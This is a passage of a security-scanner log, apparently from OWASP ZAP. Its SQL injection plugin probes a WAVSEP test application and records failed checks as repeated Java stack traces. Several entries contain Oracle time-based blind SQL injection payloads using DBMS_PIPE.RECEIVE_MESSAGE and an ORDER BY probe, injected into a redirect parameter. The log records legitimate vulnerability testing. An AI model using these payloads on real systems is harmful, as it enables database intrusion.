Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681731 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com) AND 9344=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(73)||CHR(75)||CHR(75),5) AND (4687=4687] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com) AND 9344=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(73)||CHR(75)||CHR(75),5) AND (4687=4687 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681733 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com AND 3367=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(99)||CHR(67)||CHR(116),5)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com AND 3367=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(99)||CHR(67)||CHR(116),5) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681733 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 1664=DBMS_PIPE.RECEIVE_MESSAGE(CHR(120)||CHR(107)||CHR(99)||CHR(107),5) AND (3894=3894] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 1664=DBMS_PIPE.RECEIVE_MESSAGE(CHR(120)||CHR(107)||CHR(99)||CHR(107),5) AND (3894=3894 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681733 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com') AND 3027=DBMS_PIPE.RECEIVE_MESSAGE(CHR(85)||CHR(79)||CHR(67)||CHR(67),5) AND ('mZvj'='mZvj] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com') AND 3027=DBMS_PIPE.RECEIVE_MESSAGE(CHR(85)||CHR(79)||CHR(67)||CHR(67),5) AND ('mZvj'='mZvj at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681735 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 4605=DBMS_PIPE.RECEIVE_MESSAGE(CHR(121)||CHR(65)||CHR(88)||CHR(89),5)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 4605=DBMS_PIPE.RECEIVE_MESSAGE(CHR(121)||CHR(65)||CHR(88)||CHR(89),5) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681735 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com' AND 3124=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(68)||CHR(98)||CHR(98),5) AND 'QgvJ'='QgvJ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com' AND 3124=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(68)||CHR(98)||CHR(98),5) AND 'QgvJ'='QgvJ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681736 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com%' AND 7570=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(67)||CHR(80)||CHR(69),5) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com%' AND 7570=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(67)||CHR(80)||CHR(69),5) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681737 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 7164=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(73)||CHR(121)||CHR(102),5) AND ('VunN'='VunN] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 7164=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(73)||CHR(121)||CHR(102),5) AND ('VunN'='VunN at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681738 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com AND 4814=DBMS_PIPE.RECEIVE_MESSAGE(CHR(84)||CHR(105)||CHR(104)||CHR(86),5)-- LInS] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com AND 4814=DBMS_PIPE.RECEIVE_MESSAGE(CHR(84)||CHR(105)||CHR(104)||CHR(86),5)-- LInS at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681738 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 5776=DBMS_PIPE.RECEIVE_MESSAGE(CHR(83)||CHR(77)||CHR(74)||CHR(71),5) AND 'tkeU'='tkeU] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 5776=DBMS_PIPE.RECEIVE_MESSAGE(CHR(83)||CHR(77)||CHR(74)||CHR(71),5) AND 'tkeU'='tkeU at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681739 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com) ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com) ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681740 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 4745=DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(79)||CHR(67)||CHR(73),5) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 4745=DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(79)||CHR(67)||CHR(73),5) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681741 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 1490=DBMS_PIPE.RECEIVE_MESSAGE(CHR(106)||CHR(117)||CHR(66)||CHR(84),5)-- yHCh] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 1490=DBMS_PIPE.RECEIVE_MESSAGE(CHR(106)||CHR(117)||CHR(66)||CHR(84),5)-- yHCh at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at 